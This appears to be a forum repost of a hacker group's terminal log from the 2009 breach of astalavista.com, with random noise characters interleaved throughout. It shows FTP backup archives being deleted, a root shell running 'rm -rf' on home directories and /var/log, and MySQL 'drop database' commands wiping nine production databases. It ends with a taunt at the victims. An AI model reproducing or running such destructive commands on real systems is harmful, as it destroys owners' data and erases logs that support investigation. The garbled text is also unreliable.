0 f! _; ?+ g7 ]7 y+ _ @1 s9 Y250 CWD command successful.
! X0 {9 I: ]+ @" c" lftp> ls -la& ]! Q" r/ k# ~0 d: `
227 Entering Passive Mode (212,254,194,163,2,189)- F# e! z! A+ |: m! x
150 Opening BINARY mode data connection for ‘file list’.4 i8 ~/ ?. ~8 j+ |
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar: [8 l1 J. n3 O1 Y. p- F$ v
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
# d! q5 W" h1 `! I( h-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz26 c2 O1 V% n% u( C+ {" m* C. Q/ n
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
; H$ E O7 ^/ J0 X1 s; L-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
* I* ?% |* k! K3 R9 b( X% b% X9 B8 G[snip]
3 S7 T% j$ J! m. g226 Transfer complete.
0 t: c2 S' |9 X& r6 mftp> mdelete *
2 W# h; Y) E7 f0 {6 Eftp> ls -la i E* l' G; v+ h. x% X( X
227 Entering Passive Mode (212,254,194,163,2,193)5 d4 Z8 i* T( W. O2 n( A
150 Opening BINARY mode data connection for ‘file list’.
; d0 N" x/ _* S$ P- ?2 p! j226 Transfer complete.
0 M4 K3 O) f/ Wftp>: N3 `) X) o% |3 S6 Q
1 u# A: d2 O2 j- m% g. j
sh-3.2# cd /home
$ {! n- V/ J% {, dsh-3.2# ls -la. |; |# A6 i* x8 U6 R# b
total 120
! b e5 S# J: r" s2 _; f! Adrwxr-xr-x 14 root root 4096 Mar 11 17:56 .5 ^( S: J" [- a7 A) w$ O
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, d+ E- e: z+ O) m+ j0 Odrwx–x–x 9 admin admin 4096 Nov 28 2007 admin+ V; m" V6 P( V$ Q! |. q K6 Z# c
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
. L3 W& w! {- g-rw——- 1 root root 8192 Jun 3 02:45 aquota.user5 A9 [4 J* n- c! `! ?
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
; d. r g: q# L0 Y) odrwxr-xr-x 2 root root 4096 Jul 29 2008 backup/ M# g; U2 y4 a0 q9 S
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161% K g9 I; v h/ F, d! R( g
drwx–x–x 10 com com 4096 Apr 28 12:40 com" Y9 L+ L- n$ n/ f
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
& d7 U9 v, \" N! {0 hdrwx—— 3 jon jon 4096 Sep 21 2007 jon' [' L' u; s: }
drwx—— 2 root root 16384 Sep 11 2007 lost+found% n" C c% ], ^- M4 @( d
drwxr-xr-x 2 root root 4096 Sep 14 2007 my$ I* j" [- Q" S
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata3 V2 D5 Y q0 L7 w& h2 S/ q' }' |
drwx—— 2 jon jon 4096 Sep 15 2007 test
h% M7 ?, ?! F+ Z7 } ^' H) G, x3 @drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& ?/ O) t8 |; {' \3 d, h9 L
& }( X# z, d% H* y4 T/ i, ksh-3.2# rm -rf backup/2 ^% C( I: F9 [) D% ~" \
sh-3.2# rm -rf backup.14161/- A/ F& I' ^0 B4 k5 H$ k
sh-3.2# rm -rf ftp/
- j5 G* x4 U7 R: msh-3.2# rm -rf jon/
" B/ b6 Y( q) E: T5 ~sh-3.2# rm -rf my/+ e3 V- l, a) ~
sh-3.2# rm -rf mysqldata/
. Y3 v6 p/ x1 h6 gsh-3.2# rm -rf test/
/ C$ {4 A m* k( ]4 ^- m2 Psh-3.2# rm -rf tmp/
) e* I1 B2 {1 csh-3.2# cd ~; x9 L& J0 |6 x: s7 c
sh-3.2# rm -rf *
' _" T! g" n6 m, Y3 V5 Ssh-3.2# rm -rf /var/log/
& N! B- H5 L; l3 D6 l+ M6 krm: cannot remove directory `/var/log//proftpd’: Directory not empty' h8 E( c* ]7 J4 W E _
sh-3.2# rm -rf /home/*
& ~. k C3 k3 J f* I csh-3.2# mysql% @' {, S4 T" x7 n
Welcome to the MySQL monitor. Commands end with ; or \g.' w+ K2 \) @2 y/ ^* h
Your MySQL connection id is 407156- v. O8 L' ?6 @! P6 |
Server version: 5.0.45-community-log MySQL Community Edition (GPL)' P- j, r: n' M, g. t9 D/ y
0 Y5 X$ q s+ ~* S) x# Y- P( TType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 a/ _, f3 c# s# A& E3 T* k5 f w* b8 r$ u- e8 R
mysql> show databases;
+ {, j6 L# S+ R3 h# p+———————–+
( T0 @' E$ i( K* R8 ^& J c| Database |' x9 @: l8 X/ i2 X9 }2 u! O7 i3 I
+———————–+
% M( U8 {+ t4 _: z$ W| information_schema |; P1 o7 x& s/ U6 k( ~1 \0 y
| astanet_ads |
7 l* e8 R2 G: u( D* @% X. Z( @| astanet_mailing_lists |2 \2 t, R6 J6 Y) i
| astanet_mediawiki |
" K' {* Z5 I+ H0 v4 [1 J7 X| astanet_membersystem |0 {- O, n+ e& {) e& N
| com_contrexx |
P2 V4 I: f6 t) B1 d| com_contrexx2 |
, r3 n- @. m( s# {+ t& t| com_contrexx2_live |9 O* N# E' ]' h4 u0 x
| da_roundcube |' C# E6 f( r4 R9 x
| dolphin |9 W% w2 @ L" c" N9 p8 I7 _
| ideapool |# M% x: e+ E1 y. ]/ \( U) Z
| mysql |
c; \, s3 Q- |" S5 x+ i| test |9 V# S9 l2 X0 ^4 I* J3 B
| yourmaster |) U4 F D- o+ Q+ f& d/ j' s3 q
+———————–++ |* t: Z& Q" e+ A
14 rows in set (0.03 sec)$ }9 e+ T- e: u8 U' c; C% S J
V& {2 a2 ~9 g% P& o
mysql> drop database astanet_membersystem;7 o5 |* o+ W2 j: J3 S K/ q! a# ~- |6 _& B
droQuery OK, 46 rows affected (0.81 sec)
; y8 [- M8 B. i$ _8 l# b7 L E
mysql> drop database com_contrexx;8 {- y; X2 T) f: {4 y
Query OK, 211 rows affected (2.72 sec)
% U; c6 e8 E4 C( M: v S& a; s
4 l! n" ?8 q, p- D7 Z/ j( nmysql> drop database com_contrexx2;
" y, U# D' v5 j) k1 |3 S# H# iQuery OK, 237 rows affected (2.23 sec)
, e8 F2 ?$ n6 v$ A6 J" I8 W5 k+ X( [! E: ~3 O; Q' C. C( `
mysql> drop database com_contrexx2_live;
/ ?7 @* }* k% Y0 ^+ q. _& d1 LQuery OK, 227 rows affected (7.63 sec)
0 S- _& O R% ?( J) t. T' t8 x! q9 ? b( q0 f7 {
mysql> drop database ideapool;
" ?. p+ W7 T2 H. T& dQuery OK, 69 rows affected (0.19 sec)+ d9 A* [3 p- w( X
2 ~& j2 I0 |( C/ r* C0 T* K# {8 wmysql> drop database yourmaster;' W2 F5 J; E; @% w1 g$ Y2 k' g
Query OK, 158 rows affected (0.55 sec)" ]$ P+ {% @ m; g* I# `1 j
: I) i7 P# q6 s3 s. k3 \, d
mysql> drop database astanet_ads;7 X0 L8 w! a. k2 W$ i } z! Q, M
Query OK, 9 rows affected (0.11 sec)
2 j% I N% ?. H: g; U/ U- v, L) \1 ?/ P- F! c& ^$ w; q# M
mysql> drop database astanet_mailing_lists;' W! n7 I% y* _% `. z9 ^% W
Query OK, 24 rows affected (1.47 sec)' K! _' I6 q/ r1 ?3 Z( t
2 [( ?+ Z8 w% M, P% F j
mysql> drop database astanet_mediawiki;
8 V8 g" j O) }7 l9 C- D7 iQuery OK, 31 rows affected (0.51 sec)6 b4 A, {1 k0 g# ~. o$ p/ s9 A
$ G4 B4 v0 ~, @9 K
mysql> show databases;" c; w+ P* Y- L. r1 N# w
+——————–+
" o1 y$ R& P( r$ N& k| Database |
/ e8 b8 v/ L5 M8 k; G+——————–+4 |, B$ R0 t* t" Q; R) r. J
| information_schema |
+ x2 l: t) o) H z| da_roundcube |8 H; q# Y- R, `: |7 T
| dolphin |
0 b* T, D8 ]: J8 A; x/ z| mysql |, h& [) m- E5 d: `+ {* {$ ]" W: t4 q
| test |, _7 c5 H8 h J" G, B+ x5 p
+——————–+! [% }. a, M9 h, Z6 @. Q
5 rows in set (0.00 sec)) h E1 X6 v! H2 V( |8 X& I a- l
/ A; Z, q5 X- f* T& tWhat a journey! We’re not sure exactly why the “Terminator” had any influence on9 _2 s {9 y9 }* e
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the; G: a$ f, t2 B9 T% X$ F+ u# H y+ _
wrong to say this pack of morons *wont be back*.( Z6 ]" q, ?/ ?# j$ L) N" D$ n* C# w
|
发表于 2012-11-6 21:07:34
收藏
支持
反对